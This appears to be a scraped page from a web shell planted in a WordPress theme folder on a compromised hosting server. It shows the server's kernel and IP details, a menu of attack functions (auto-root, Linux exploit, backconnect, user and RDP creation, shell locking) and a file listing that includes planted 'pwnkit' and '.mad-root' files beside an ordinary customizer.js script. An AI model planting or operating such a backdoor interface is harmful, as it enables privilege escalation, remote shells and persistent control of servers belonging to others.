Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
alpha /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accordion.js
687
B
-rw-r--r--
buttons.js
858
B
-rw-r--r--
customizer.js
1018
B
-rw-r--r--
navigation.js
2.22
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
slider.js
1008
B
-rw-r--r--
tabs.js
791
B
-rw-r--r--
video-popup.js
1.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customizer.js
/* global wp, jQuery */ /** * File customizer.js. * * Theme Customizer enhancements for a better user experience. * * Contains handlers to make Theme Customizer preview reload changes asynchronously. */ ( function ( $ ) { // Site title and description. wp.customize( "blogname", function ( value ) { value.bind( function ( to ) { $( ".site-title a" ).text( to ); } ); } ); wp.customize( "blogdescription", function ( value ) { value.bind( function ( to ) { $( ".site-description" ).text( to ); } ); } ); // Header text color. wp.customize( "header_textcolor", function ( value ) { value.bind( function ( to ) { if ( "blank" === to ) { $( ".site-title, .site-description" ).css( { clip: "rect(1px, 1px, 1px, 1px)", position: "absolute", } ); } else { $( ".site-title, .site-description" ).css( { clip: "auto", position: "relative", } ); $( ".site-title a, .site-description" ).css( { color: to, } ); } } ); } ); } )( jQuery );
Close